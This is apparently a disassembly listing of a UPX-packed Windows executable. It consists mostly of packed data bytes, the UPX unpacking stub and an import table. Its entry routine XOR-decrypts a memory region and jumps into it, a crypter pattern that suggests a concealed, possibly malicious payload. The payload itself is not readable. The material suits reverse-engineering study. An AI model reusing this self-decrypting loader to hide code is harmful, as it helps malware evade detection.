dd 2028D34Dh, 0A604181Ch, 0F4659A69h, 0E0E8EC19h, 69A69AD8h
dd 0C0C4D09Ah, 6CA8B4B8h, 0A069A69Ah, 80848C98h, 6B4D3319h
dd 0E74B737h, 545C0668h, 184AC201h, 42B04B50h, 89B246ADh
dd 18277210h, 75D6741Bh, 0ABC4F49h, 612DE838h, 616C8E87h
dd 5986006Eh, 70A7C877h, 0C638627Dh, 6B30D539h, 63769336h
dd 3AD3A17h, 6F4F3515h, 0E6B72B69h, 7061696Bh, 6D6569B6h
dd 434EEB6Fh, 0EF71645Dh, 95881EDCh, 0E68013EEh, 0F976D62h
dd 4CE09B6Dh, 48D30EA4h, 6C717E43h, 0EC1B3B60h, 262B6FEEh
dd 6264C007h, 73DDC6EDh, 16320E40h, 76DA2907h, 7760F109h
dd 0F265B6Fh, 0B5B5A437h, 4B621FD9h, 0B1B30E1Fh, 5F0E5F4Bh
dd 6E0A6F37h, 5FD0B4B0h, 0F70F1F27h, 94BC1BA4h, 6F3E0EA6h
dd 0C04E9161h, 7788B7Bh, 37EF166Ch, 0F98DEDE8h, 6375660Eh
dd 78651A6Bh, 2E318B63h, 0EFF9373Bh, 5C862536h, 0A46E2778h
dd 967589EFh, 0E17CDA5h, 0D9703FD3h, 0AD6BA176h, 8B7F0F65h
dd 6E2DDDDDh, 79AD923Dh, 9118B1Eh, 3E27142Eh, 1F69A58Eh
dd 103BDD0Ch, 2272CFA5h, 0D6177160h, 270F737Eh, 12120713h
dd 6B45ECE2h, 0FB65708Fh, 6EF7060h, 69DF3CC3h, 0ECFB762Eh
dd 66A7BC05h, 2D3E4C72h, 3345656Ah, 62FE5834h, 7100626Fh
dd 87977A77h, 0BF1F0156h, 7A617135h, 93E5325Eh, 16E3DF27h
dd 70780EBAh, 5BC56B32h, 3839CE27h, 0FF6DA5FFh, 12C25318h
dd 617FC1Eh, 169E1E5Bh, 176568DEh, 9762500Ah, 6A3672D7h
dd 1F25B696h, 16769B1h, 1F097783h, 67650701h, 7C6F746Eh
dd 24D56CADh, 7B2E2CEh, 728E0F0Ch, 1F01BA74h, 8C465AE1h
dd 76D4C7AFh, 5184ECDAh, 4486FD42h, 0C1A84F77h, 0CE06838Ah
dd 0D1E97873h, 692603EEh, 1C6D4E0Ch, 0A2B52932h, 0D2476E26h
dd 21AC32FFh, 3448B325h, 20CE330Fh, 31320C83h, 1BB06C30h
dd 1F1A1523h, 2C0B017h, 0F472F0Bh, 0B0B0B333h, 0E062F1Fh
dd 11BBBB16h, 7057BE2Dh, 0E936777h, 24522B4Fh, 0F3D2E31Ah
dd 6BA07746h, 6D5E3117h, 3D702606h, 730FDC82h, 58B688EBh
dd 1FBC3624h, 30275A5Fh, 6426EC5Bh, 651F4793h, 9A2C4310h
dd 2A8E69BEh, 3C439C03h, 2F012CF1h, 1788F800h, 3E4228CEh
dd 0E243457Fh, 5D5BC6EDh, 6F2E2E1Ch, 7E155Fh, 20FCA10Fh
dd 56047427h, 267A69B8h, 6F206F94h, 631EC0B1h, 3E3E812Fh
dd 1C297A29h, 20DB58DAh, 71239F2Bh, 818F775h, 5B1F151Bh
dd 0C932D20h, 2DECF678h, 4B183A73h, 0A0DC526h, 7C04DF27h
dd 524457C6h, 7B3D8349h, 0F8E713DCh, 875320B7h, 26833B7Dh
dd 4560FDBBh, 553BB351h, 3B124449h, 0FC0D5750h, 52EC0CDh
dd 4320817Dh, 4544464Bh, 659F6B4Eh, 460AC91Bh, 41434746h
dd 0DDDA3703h, 452000FFh, 4644454Bh, 0B494545h, 0B010322h
dd 9D63F8A7h, 4D53FF85h, 53180542h, 317814F0h, 0B1FEFF59h
dd 0FE500200h, 9BEF13FFh, 4B9154D9h, 4F525020h, 4D415247h
dd 302E3120h, 0FEEC88D8h
dd 4E414C2Fh, 0B715054Dh, 88EFA700h, 6B0757E2h, 0FA364767h
dd 1D6BDFDAh, 61312E33h, 32474D4Eh, 0C1658858h, 321BBFF2h
dd 544E152Dh, 204D4C20h, 0B173230h, 0B90CF239h, 3280173h
dd 75DFCD09h, 6DD715C0h, 35DFFF0Ch, 8128DFFFh, 5C1F5D01h
dd 7E8000D0h, 6596000h, 0FF37FF06h, 1062BFFh, 0A0020505h
dd 0A04D304Fh, 60C300Eh, 8201040Ah, 0A020237h, 39043BA2h
dd 770B4767h, 7741DBDDh, 58780201h, 8EC25h, 108C0209h
dd 0FFFC6C02h, 0B5BC307Fh, 6C50554Fh, 66785051h, 51534932h
dd 31564567h, 4F4B4762h, 0EA869DE0h, 39E13109h, 23626081h
dd 17FFC35h, 64A6490Dh, 0DDAF2022h, 0D2FFFC11h, 0AC81A100h
dd 0A2A98130h, 8104A681h, 920353A3h, 0AC335AC3h, 580F4002h
dd 0A9700212h, 0ECBC1082h, 0F20B441h, 0FFB3A200h, 0EDFF8E8Fh
dd 778839B7h, 0EDBE16D7h, 1FB7AE42h, 84C16DBBh, 0FECF0199h
dd 86BFFFFh, 65BA78B1h, 9AD30A43h, 298649E2h, 4F0057h
dd 4B0052h, 55130A47h, 0B807600Eh, 51CBF300h, 0FA66570Ah
dd 6D26BED4h, 1A530049h, 5600A967h, 0EB0DE182h, 0B74A6238h
dd 72032027h, 206BA711h, 1C85B1CDh, 2E40070Dh, 140B0477h
dd 0DE37E329h, 90872CF6h, 4200175h, 0FBA6DA00h, 0FF0CA5E8h
dd 3F0024B1h, 90BE1700h, 0A2666791h, 4780807h, 0F77C7550h
dd 772D4007h, 165CDEDEh, 530421B7h, 2019FF2h, 0C9F7901h
dd 1396438Ah, 6FBF64BCh, 0D840DC00h, 0B0077C3h, 3F3B1265h
dd 1C95B4CAh, 0ED72F4Eh, 0C294FBBBh, 0A2080493h, 6DF27F6Eh
dd 50F83h, 0CF11030Bh, 0FF16D002h, 883907Fh, 3323840Bh
dd 95081FB3h, 304A2C0Eh, 0F708C32Ch, 7E3BFF7h, 49A0183h
dd 0EB8A885Dh, 9F11C91Ch, 102B9BE8h, 84746048h, 1B7FFFCh
dd 1E0EBE56h, 216154A7h, 5A0491E0h, 82E623E4h, 0FFBB02D0h
dd 0E902337Fh, 0E77F4FDFh, 0A54D6B2Bh, 833CAAD4h, 2AA10315h
dd 0CDFFFE57h, 50AD0301h, 0B919D89Ah, 991CF35Ch, 1EAD5341h
dd 0E0BF7560h, 57341D80h, 21975E04h, 9E409F7Eh, 0FFE4219Bh
dd 0EBD7BEC9h, 37F1B0A4h, 50595FEh, 0B204C8FDh, 8B52FFFCh
dd 3A74CC85h, 0E029158Bh, 16ACCD30h, 0FFFE4201h, 0DE5B06CDh
dd 25E19ACBh, 101F7283h, 0E792A2A3h, 0FFC87636h, 740739BFh
dd 9C0CDF4h, 0BEF37F2Dh, 0C3573B8h, 0F9685206h, 8476FFFh
dd 256CE5AEh, 1B8AE1EAh, 56174AC2h, 0C3EE2988h, 0BFFF0106h
dd 5E090860h, 7D705026h, 0AF82884Dh, 1D963D7Bh, 5FFEBEAh
dd 9A17C847h, 4FC8060Ah, 16704B32h, 0C71201D3h, 78FF210Bh
dd 6EBF475Ah, 388E1h, 25EE863Bh, 0A2EC903h, 8503BB80h
dd 8E3DAD1Ch, 0D2FB0747h, 0BC4CD20Ch, 0F000BCBCh, 0BC320E0Fh
dd 1F8602A4h, 1FA07900h, 0BF0B994h, 590E45B5h, 0FFF54C00h
dd 0C555BA6Fh, 55462C0Eh, 454C4D6Eh, 7A4E6476h, 0FEAF6E6Ah
dd 5874FFDFh, 76416E7Ah, 44534F63h, 556C5509h, 4A464C4Ch
dd 6D39436Dh, 0FFF7FF6Ah, 586567FFh, 43446270h, 6A744149h
dd 50525444h, 58797841h, 66435949h, 6A767844h, 0E31E5852h
dd 5774FFFFh, 43417953h, 72506371h, 6548577Ah, 664B5561h
dd 75453B72h, 0FF807FFFh, 7A555A2Bh, 0C3627A50h, 384642A9h
dd 256715D5h, 47B9A89Bh, 0FFFFFF97h, 92B13FFFh, 96FC037Bh
dd 8D040566h, 0B49F91B6h, 1D2CFD30h, 0B3B04A41h, 0F9B83448h
dd 31F54E4Fh, 7FFFFFC9h, 0ADE983F0h, 5EC0CEE8h, 220E7681h
dd 839794BBh, 0F4E2FCEEh, 65C07FA3h, 0FF1544DDh, 73FFEFFFh
dd 686B44D2h, 0DA7FD1DEh, 0DD0F42CAh, 6FB1FDBh, 1ED21F9Fh
dd 5A92E830h, 6D1C7BBAh, 0FFFFFFFFh, 2C81FA3h, 0A9DE7FBAh
dd 0CC961F8Fh, 8E0E548Ah, 25E3543Fh, 239A5E7Ah, 19637F79h
dd 57BFB0EFh, 0BCBFFFF1h, 0F1063F5Eh, 1CDFB7A9h, 7C95A77Dh
dd 1E1F9721h, 0F6889F4Eh, 0FFFFFFFFh, 0A9F34F83h, 621CA4F8h
dd 3EE71FB7h, 2AD71F16h, 6C19FCE5h, 0DDC778B5h, 44C4F26Dh
dd 0FFFFA7D3h, 4AA5FFFFh, 7DA5E7CCh, 4A476BEFh, 196B7970h
dd 7D416BEBh, 0A3F17132h, 77959C56h, 0F26896D1h, 0EFFF4DD3h
dd 0D79EFFFEh, 0F468C316h, 71C4C7E8h, 61C4D7E8h, 85674FE8h
dd 1DE844CBh, 30D3B776h, 0EDFFFDFCh, 367C528Dh, 77C684D1h
dd 86FF4444h, 757EBA16h, 16C44244h, 0DE12F2C7h, 0DEFFDDBBh
dd 0C1EF76C7h, 70FC2887h, 0C0ED7D5Bh, 0FEDD16DFh, 7FF7FF3h
dd 0FAF7FFFFh, 0C7FE5EABh, 1E58927Bh, 1ED0D1C5h, 886497C0h
dd 0DCBAD645h, 0FB04B8F9h, 0AFFFFC1Fh, 893CACC1h, 0DCE5FC10h
dd 57688208h, 0EC7917FFh, 0EA73C6C6h, 70796FEh, 0C1FFEF0Fh
dd 0FC6BDDC6h, 5ABEFB3Ah, 37FE8FC4h, 70A90F8Ch, 0ECFBDBE5h
dd 0DFE61468h, 0CDDE7047h, 71F77475h, 0ECC703BFh, 2EEBA0C2h
dd 0FF410B02h, 0DBE3A118h, 0B34D3648h, 0BEADDE47h, 0F8FFFFEFh
dd 0C0DEBAFFh, 544950DEh, 0FAEDFE48h, 550749CEh, 4554554Fh
dd 4B575550h, 0BF574D58h, 58FFFFFFh, 4D484755h, 434B4549h
dd 424E4559h, 4C505141h, 4E44455Ah, 47424F4Fh, 3DB3BA35h
dd 0FFFF8FC0h, 0F81BD585h, 4D62EB4Ah, 5754435Ah, 5759484Ch
dd 19ACE49h, 636601D1h, 0DE5C0F3Dh, 9C85CB10h, 0DF5B5C0Ah
dd 37FC2001h, 8073205h, 565253C7h, 77435653h, 0E9B81BABh
dd 56E830CBh, 0F750C389h, 68FE8FFFh, 0EC0E4E8Eh, 0C9F85FE8h
dd 6E6FB966h, 72756851h, 0FF546D6Ch, 407F33D0h, 1A36FC8Ah
dd 45E8702Fh, 8D563723h, 0F7FF0115h, 51560C77h, 98685331h
dd 0E80E8AFEh, 0F057142Ch, 1CFC5B36h, 0DB2D49B0h, 3E494FB5h
dd 0A1645655h, 88453BFCh, 1C7056E4h, 8688BADh, 4529E889h
dd 0C2C9242Ch, 8BC218Fh, 8B3C0147h, 0FEFFFFFFh, 1780554h
dd 174A8BEAh, 0EB01205Ah, 8B4935E3h, 0EE018B34h, 31FCFF31h
dd 0E038ACC0h, 0FDE5F774h, 0CFC107FFh, 0EBC7010Dh, 247C3BF2h
dd 47E17514h, 0C8B6624h, 1BE3114Bh, 8B1C977Ch, 0E9E85304h
dd 0EA8957A4h, 41FAEB62h, 7B30E8E6h, 91C2A707h, 1F1CB08Fh
dd 61CD0408h, 79BFCF13h, 1E060D77h, 88F72702h, 8916E26Fh
dd 9CDB036Fh, 0F807365Ch, 9E0417C2h, 2EEF5712h, 1E06BBC4h
dd 0BF21D005h, 61E0671h, 36577602h, 1E063969h, 0C695C601h
dd 2F3AD0A0h, 851B802Fh, 2F69ACD5h, 0A3978B5h, 0EFA02D06h
dd 0A9A2E82Fh, 895C010Dh, 7792040Ch, 66484334h, 95C02273h
dd 1CFF9667h, 0E51FE145h, 70DF2EC4h, 626D7379h, 889DF9C6h
dd 61615327h, 642A2061h, 0E3638368h, 301F2335h, 246B42E1h
dd 5320D322h, 2D22DB11h, 1A2B5E7Bh, 0A906F618h, 572A312Eh
dd 69BD637Bh, 7BD95020h, 0F631272Ah, 2AB06932h, 33CC67BFh
dd 0D0F7E089h, 76732F90h, 2E630572h, 70FC8D63h, 1BDAF8Ah
dd 4012DA39h, 0D6F6816Dh, 736D358Bh, 0C5527599h, 9900EF26h
dd 12B7705h, 36B6345Ah, 531F0511h, 2F008500h, 22D4642Ah
dd 721B0668h, 0C191162Fh, 0BC282B78h, 1306A395h, 0CF294DF4h
dd 4793DDB2h, 61876850h, 75666174h, 456046Dh, 666FDC55h
dd 1468060h, 134ED71Fh, 602D6ED4h, 3A6F53CAh, 6B6D0120h
dd 627521CFh, 90651F2Dh, 0AFD1B208h, 3C00B4F0h, 208B9F0Ah
dd 0E5007475h, 0CB9E4E14h, 6DA098E1h, 0F8019B40h, 1B3A9604h
dd 74F8B016h, 0EBA18E0Eh, 6F352D57h, 0A11C2D1Eh, 0CF3982A2h
dd 384A1C27h, 0F94302EBh, 4FFD891Fh, 0D9A5B85h, 0FF0E7380h
dd 2FF9E243h, 0B4EA8382h
dd 4B0C2AB1h, 0D0EA5061h, 6941425Ah, 0C7075B66h, 2C0A5F9Ah
dd 0B05C9E5Ch, 79BA6DA0h, 6936B53Dh, 253D4Ch, 0B73335BDh
dd 489DE352h, 5CCDD3F8h, 4C454853h, 342CFB4Ch, 0E1981881h
dd 3D816153h, 3EE1AA54h, 936C5E1Dh, 657BD672h, 2C481D77h
dd 73F2AC1Bh, 0A2F14BCFh, 30AC247h, 73D64C3h, 2B821BB2h
dd 6F5D6F5Bh, 380DE085h, 6D2526ECh, 2E5B3F65h, 670A184Bh
dd 7FA33662h, 568C9BACh, 8F534C43h, 3534367Bh, 0F5614646h
dd 30FFFBEAh, 3830352Dh, 30312D31h, 392D4231h, 7B2D381Fh
dd 8B04141h, 46273FF0h, 45343539h, 1E1A9B7Dh, 6B5197C2h
dd 0BB694E91h, 1FCDFDFFh, 362D6D53h, 3209322Dh, 34343334h
dd 90933637h, 3BFF9A57h, 313901AFh, 2D373339h, 0C5333036h
dd 0BD81F078h, 8F334731h, 59434552h, 1152450Bh, 8FC38945h
dd 9553660Ah, 2D3E38F0h, 775E3A3Ch, 5B8F76B5h, 4BF7131h
dd 452469FFh, 367868C6h, 16CC62Dh, 861DE990h, 7081C07Bh
dd 5512EF9Bh, 7C3475h, 5D66625Dh, 0EB389779h, 0FD72701Fh
dd 50545448h, 0AAC16D2Fh, 208207C3h, 85534B4Fh, 1DC431h
dd 271E70C1h, 0B76FE21h, 1F2D229Fh, 2D6F6E2Fh, 86717863h
dd 102C22F6h, 6311EE73h, 0BBB52D78h, 3D890FBBh, 11695730h
dd 2E14491Dh, 6E7AB301h, 77832D77h, 661E24EDh, 67094C23h
dd 521D7CB1h, 2692669h, 61522570h, 0B9776B3Bh, 79627365h
dd 0FE445243h, 11140466h, 4D47E323h, 622DEC7Dh, 8325E847h
dd 26FB33EAh, 6BE54206h, 69712773h, 2DFF1226h, 17BB8050h
dd 0EF0325ACh, 1F1AFA38h, 26544547h, 3D3A4848h, 0BAE7DF3Ah
dd 0CE643F12h, 14D2007h, 24537920h, 190F3225h, 4212AA2Fh
dd 3CA86F8Ah, 4AAA6D7Eh, 1539986h, 830AA08Ah, 485041F9h
dd 0A802802h, 15005064h, 2A00A148h, 54014290h, 0A8028420h
dd 50050940h, 0A00A1281h, 40142402h, 80284805h, 50900Ah
dd 0A12015h, 142402Ah, 2848154h, 50902A8h, 0A120550h, 14240AA0h
dd 28481540h, 50902A80h, 0A1205400h, 4240A800h, 84815001h
dd 902A002h, 12054005h, 240A800Ah, 48150014h, 902A0028h
dd 20540150h, 40A802A1h, 81500542h, 2A00A84h, 5401409h
dd 0A802812h, 15005024h, 2A00A148h, 54014290h, 0A8028420h
dd 50050940h, 0A00A1281h, 40142402h, 80284805h, 50900Ah
dd 0A12115h, 1C0C22Ah, 3F64C404h, 389307F9h, 10007A4h
dd 657A6953h, 90281819h, 60467009h, 58215B20h, 911F4174h
dd 0BBB3604Ch, 0DAC0C216h, 69542137h, 1821416Dh, 1ED0A38h
dd 44303042h, 66DE0159h, 1AB89EFh, 6333736Ch, 50F35377h
dd 0DB7B816Fh, 841F7E04h, 4D82CD81h, 8EF6BC09h, 4279BF82h
dd 16433045h, 0C1942C0Ch, 61DDDA90h, 4D4C01A1h, 0DAB82B9Bh
dd 2D7A304Bh, 28C6D049h, 23355313h, 41FDC0C1h, 7053646Eh
dd 3041EF3h, 68D105E5h, 0C12256Fh, 0E1B71888h, 24DE0DDDh
dd 551B76FFh, 0DA56451Dh, 0BDEE0BBh, 6FC5628Dh, 9C6F1950h
dd 1312E079h, 6C22ED06h, 2560970Bh, 87B1492Fh, 27D42060h
dd 0FB3E0C30h, 736F6F42h, 7970E1D2h, 40615ECh, 656CF307h
dd 4C30736Eh, 0A6127B20h, 61AC54EFh, 4D1541B5h, 8776B63Ch
dd 3319B8F8h, 3C3D7441h, 62E2361Ch, 54E60575h, 0D8106D6Dh
dd 9A87C302h, 3142212Dh, 6D2942CBh, 60B365EBh, 0D1064350h
dd 9EFB21B0h, 9D4C6B20h, 0B7F96172h, 42064370h, 9769636Bh
dd 0FB1460DAh, 0F0615D94h, 7845E185h, 70163969h, 6E0AB361h
dd 4BAB811Dh, 0EB403B66h, 576C5B28h, 3C53CA61h, 0AD9DB6Ch
dd 5B287DC2h, 0F16D2CAFh, 6D651145h, 0CD7B5E70h, 6397B018h
dd 306937C5h, 41C1A2F1h, 6B637BDFh, 42064833h, 0DF0105E7h
dd 0EB03058Ah, 0B2695619h, 0D8442841h, 61635B15h, 36FECB60h
dd 72646441h, 8AEED13Fh, 0DDD3256Dh, 1B174679h, 2B0B0304h
dd 4818625h, 0C667A369h, 0A5041B06h, 1461874Dh, 30350618h
dd 73B6B690h, 5818418Dh, 0B5F18090h, 20DBB018h, 491C51EFh
dd 314941D5h, 0CB08BAD1h, 4C8184C6h, 77D92DA3h, 7CDECD9Bh
dd 4D5F5FA5h, 0C2656E5Fh, 0C58666FCh, 2602FD19h, 63585F1Bh
dd 0A6FB3170h, 6625A45Ah, 266B6577h, 305E9955h, 66E374C7h
dd 0B6695F67h, 0AF79975Eh, 739E6D4Ch, 682A75D1h, 407D7223h
dd 8616818h, 9664665Fh, 0F55BDC09h, 1B05703Eh, 4060761Bh
dd 661B6585h, 0DC0C7217h, 70593DD3h, 1E704323h, 62E2818h
dd 0EF3266E1h, 746C285Dh, 9F2639B1h, 0CF5CDE13h, 106DFBECh
dd 886E2132h, 6D776C35h, 0DECFD94Fh, 6E707344h, 556B6511h
dd 3B78EB03h, 737642D3h, 74CA706Eh, 26D3B90h, 36C54DB3h
dd 756591EAh, 0BC33AB7Fh, 1A787296h, 3F3F2B26h, 0B1B4032h
dd 4159FF33h, 49584150h, 93395A40h, 6DBBE45Fh, 0C6736B80h
dd 0D272680Eh, 115A5816h, 0B0434F04h, 700C3082h, 360425C7h
dd 2FF56E2Ch, 2C3CFD17h, 5F8ECA76h, 33858468h, 0D787941Ah
dd 426CC966h, 58F87367h, 727AAA70h, 700FE353h, 0B9B30186h
dd 0A688E999h, 1C08E40Ch, 6D381545h, 0F58F30E8h, 0C0C0BC52h
dd 139182Dh, 0C2022BBCh, 0F05F019Bh, 0DBCB2CB2h, 97050CFFh
dd 0CB131001h, 6FCB2CB2h, 11123417h, 0B2CB2C73h, 903162Ch
dd 2CB20215h, 50DB2CBh, 0C80A0B33h, 14C6A7FFh, 455037h
dd 5014C00h, 2DB93300h, 0DE6D9D49h, 0F00E03Fh, 6010B01h
dd 6E8C819h, 0D8C52A27h, 38A77B72h, 17401A10h, 76670402h
dd 0F5B6C8Fh, 0C007F018h, 693C0151h, 0EC1B4B72h, 5F0D0F10h
dd 0E81F90B0h, 0D06B8CC6h, 11380007h, 0A9DF215Ch, 7C6FB408h
dd 8602E03h, 744107B6h, 21C7F30Eh, 6E5E06C8h, 20058983h
dd 83722E60h, 910833B4h, 0E0460204h, 0ED65F9CCh, 4404F62h
dd 644F4D2Eh, 4A7B06B7h, 48F0669Ah, 692EC0D0h, 25E6C951h
dd 0F7101C78h, 118124Fh, 58B4CF9Dh, 0E8F1AEDh, 92983718h
dd 2A1A4EA6h, 24372742h, 84DFC249h, 0E66B07B7h, 80000007h
dd 0FF924Ah, 2 dup(0)
; ---------------------------------------------------------------------------
pusha
mov esi, offset dword_47A000
lea edi, [esi-79000h]
push edi
or ebp, 0FFFFFFFFh
jmp short loc_480ED2
; ---------------------------------------------------------------------------
align 8
loc_480EC8: ; CODE XREF: UPX1:loc_480ED9�j
mov al, [esi]
inc esi
mov [edi], al
inc edi
loc_480ECE: ; CODE XREF: UPX1:00480F7A�j
; UPX1:00480F91�j
add ebx, ebx
jnz short loc_480ED9
loc_480ED2: ; CODE XREF: UPX1:00480EC0�j
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480ED9: ; CODE XREF: UPX1:00480ED0�j
jb short loc_480EC8
mov eax, 1
loc_480EE0: ; CODE XREF: UPX1:00480F0A�j
add ebx, ebx
jnz short loc_480EEB
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480EEB: ; CODE XREF: UPX1:00480EE2�j
adc eax, eax
add ebx, ebx
jnb short loc_480EFC
jnz short loc_480F0C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jb short loc_480F0C
loc_480EFC: ; CODE XREF: UPX1:00480EEF�j
dec eax
add ebx, ebx
jnz short loc_480F08
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480F08: ; CODE XREF: UPX1:00480EFF�j
adc eax, eax
jmp short loc_480EE0
; ---------------------------------------------------------------------------
loc_480F0C: ; CODE XREF: UPX1:00480EF1�j
; UPX1:00480EFA�j
xor ecx, ecx
sub eax, 3
jb short loc_480F24
shl eax, 8
mov al, [esi]
inc esi
xor eax, 0FFFFFFFFh
jz short loc_480F96
sar eax, 1
mov ebp, eax
jmp short loc_480F2F
; ---------------------------------------------------------------------------
loc_480F24: ; CODE XREF: UPX1:00480F11�j
add ebx, ebx
jnz short loc_480F2F
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480F2F: ; CODE XREF: UPX1:00480F22�j
; UPX1:00480F26�j
adc ecx, ecx
add ebx, ebx
jnz short loc_480F3C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480F3C: ; CODE XREF: UPX1:00480F33�j
adc ecx, ecx
jnz short loc_480F60
inc ecx
loc_480F41: ; CODE XREF: UPX1:00480F50�j
; UPX1:00480F5B�j
add ebx, ebx
jnz short loc_480F4C
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
loc_480F4C: ; CODE XREF: UPX1:00480F43�j
adc ecx, ecx
add ebx, ebx
jnb short loc_480F41
jnz short loc_480F5D
mov ebx, [esi]
sub esi, 0FFFFFFFCh
adc ebx, ebx
jnb short loc_480F41
loc_480F5D: ; CODE XREF: UPX1:00480F52�j
add ecx, 2
loc_480F60: ; CODE XREF: UPX1:00480F3E�j
cmp ebp, 0FFFFFB00h
adc ecx, 1
lea edx, [edi+ebp]
cmp ebp, 0FFFFFFFCh
jbe short loc_480F80
loc_480F71: ; CODE XREF: UPX1:00480F78�j
mov al, [edx]
inc edx
mov [edi], al
inc edi
dec ecx
jnz short loc_480F71
jmp loc_480ECE
; ---------------------------------------------------------------------------
align 10h
loc_480F80: ; CODE XREF: UPX1:00480F6F�j
; UPX1:00480F8D�j
mov eax, [edx]
add edx, 4
mov [edi], eax
add edi, 4
sub ecx, 4
ja short loc_480F80
add edi, ecx
jmp loc_480ECE
; ---------------------------------------------------------------------------
loc_480F96: ; CODE XREF: UPX1:00480F1C�j
pop esi
mov edi, esi
mov ecx, 2D5h
loc_480F9E: ; CODE XREF: UPX1:00480FA5�j
; UPX1:00480FAA�j
mov al, [edi]
inc edi
sub al, 0E8h
loc_480FA3: ; CODE XREF: UPX1:00480FC8�j
cmp al, 1
ja short loc_480F9E
cmp byte ptr [edi], 6
jnz short loc_480F9E
mov eax, [edi]
mov bl, [edi+4]
shr ax, 8
rol eax, 10h
xchg al, ah
sub eax, edi
sub bl, 0E8h
add eax, esi
mov [edi], eax
add edi, 5
mov eax, ebx
loop loc_480FA3
lea edi, [esi+7E000h]
loc_480FD0: ; CODE XREF: UPX1:00480FF2�j
mov eax, [edi]
or eax, eax
jz short loc_48101B
mov ebx, [edi+4]
lea eax, [eax+esi+82004h]
add ebx, esi
push eax
add edi, 8
call dword ptr [esi+8208Ch]
xchg eax, ebp
loc_480FED: ; CODE XREF: UPX1:00481013�j
mov al, [edi]
inc edi
or al, al
jz short loc_480FD0
mov ecx, edi
jns short near ptr loc_480FFE+1
movzx eax, word ptr [edi]
inc edi
push eax
inc edi
loc_480FFE: ; CODE XREF: UPX1:00480FF6�j
mov ecx, 0AEF24857h
push ebp
call dword ptr [esi+82090h]
or eax, eax
jz short loc_481015
mov [ebx], eax
add ebx, 4
jmp short loc_480FED
; ---------------------------------------------------------------------------
loc_481015: ; CODE XREF: UPX1:0048100C�j
call dword ptr [esi+82094h]
loc_48101B: ; CODE XREF: UPX1:00480FD4�j
popa
jmp loc_40C52A
; ---------------------------------------------------------------------------
db 0E2h, 0F4h, 87h
dd 0CC927CA1h, 9A3D9482h, 68D03837h, 0FC15F83Ah, 2E9B5C28h
dd 4268654Ch, 0D06C1BFFh, 0BF00CEC5h, 5AD3EAA8h, 164A4959h
dd 4C487244h, 31F44188h, 27D68C87h, 0D0CBAA34h, 437514C5h
dd 0DD5F5EADh, 7A6A60C0h, 1F3DB2ADh, 2242BBF1h, 0DE86BB92h
dd 0CE65EBFEh, 2E894DF4h, 51E9EBF1h, 0E6563054h, 70DFD224h
dd 47B16A95h, 0CA4B04D9h, 0E7CADCC2h, 5F6D9C3Bh, 571BE11Ah
dd 0BE539562h, 20EBEBBFh, 0FC0343C7h, 0C32C61F0h, 0D2BC84AFh
dd 5646A2A7h, 1B8DF2A9h, 0C9DFB39Fh, 0C4828129h, 390E7E6h
dd 0DEFFAEC7h, 11215F3Bh, 0DA269976h, 0A249F427h, 6DCBDFD8h
dd 0B98CCA30h, 4E4C2D55h, 0D4DC6CD6h, 62FD88C7h, 99F2ED75h
dd 306AEAD7h, 0A34502CEh
db 0AAh, 0E5h, 2Eh
; =============== S U B R O U T I N E =======================================
public start
start proc near
push 4
push 0
push 0
push 0FFFBFFFFh
call ds:dword_4830B8 ; MessageBoxA
test eax, eax
jle short loc_481114
push 0
call ds:dword_483094 ; ExitProcess
loc_481114: ; CODE XREF: start+13�j
mov eax, ds:dword_481199
xor ds:dword_481191, eax
xor ds:off_48118D, eax
xor ecx, ecx
cmp ds:dword_481191, ecx
jbe short loc_481147
loc_48112F: ; CODE XREF: start+4E�j
mov eax, ds:off_48118D
mov dl, byte ptr ds:dword_481199
add eax, ecx
xor [eax], dl
inc ecx
cmp ecx, ds:dword_481191
jb short loc_48112F
loc_481147: ; CODE XREF: start+36�j
mov eax, ds:dword_481195
xor eax, ds:dword_481199
call eax
retn
start endp
; ---------------------------------------------------------------------------
db 29h, 30h, 9Dh
dd 50693ACh, 770AE026h, 14E17051h, 8B01C1BCh, 0B2CBA4D1h
dd 0AF3F3480h, 12BD697Dh, 19DF352Eh, 2EA7FDF6h, 0C8E97E15h
dd 83364A0h, 1273065Ch, 0EBC5Fh
db 1Fh
off_48118D dd offset dword_47A000 ; DATA XREF: start+28�w
; start:loc_48112F�r
dword_481191 dd 7021h dword_481195 dd 279BF500h dword_481199 dd 27D3FBB0h ; start+3D�r ...
align 2
dw 0F403h
dd 41F2DD51h, 623138E4h, 551BC957h, 0C541DB6Fh, 2F5DE3A5h
dd 5F6476F5h, 517C3E21h, 0C270EEE4h, 68D216DDh, 1B40C57Fh
dd 3907A864h, 0F0E68099h, 875FB310h, 1FD6CBCDh, 0D84B1A26h
dd 98B2ACAFh, 717FFE52h, 0FD8C8597h, 0FBA3F824h, 7A1DC942h
dd 34BC67FEh, 1F94CD98h, 9BFF2761h, 0F9FC1DC1h, 28CBCA70h
dd 611C6AFEh, 4FD6h, 70Eh dup(0)
db 2 dup(0)
word_482E46 dw 0 ; DATA XREF: UPX0:off_40F78C�o
align 200h
UPX1 ends
; Section 3. (virtual address 00083000)
; Virtual size : 00001000 ( 4096.)
; Section size in file : 00001000 ( 4096.)
; Offset to raw data for section: 00083000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
UPX2 segment para public 'DATA' use32
assume cs:UPX2
;org 483000h
dd 3 dup(0)
dd 830C8h, 8308Ch, 3 dup(0)
dd 830D5h, 8309Ch, 3 dup(0)
dd 830E2h, 830A4h, 3 dup(0)
dd 830EDh, 830ACh, 3 dup(0)
dd 830F9h, 830B4h, 3 dup(0)
dd 83104h, 830C0h, 5 dup(0)
dd 7C801D77h, 7C80ADA0h
dword_483094 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess dd 0
aW db 'ÉÔßw',0
align 4
aGoW db '£®Äw',0
align 4
aUjv db 'UJ¢|',0
align 4
dd 7E42DE87h
dword_4830B8 dd 7E45058Ah ; resolved to->USER32.MessageBoxA align 10h
aILq db 'i,«q',0
align 4
aKernel32_dll_0 db 'kernel32.dll',0
aAdvapi32_dll_0 db 'advapi32.dll',0
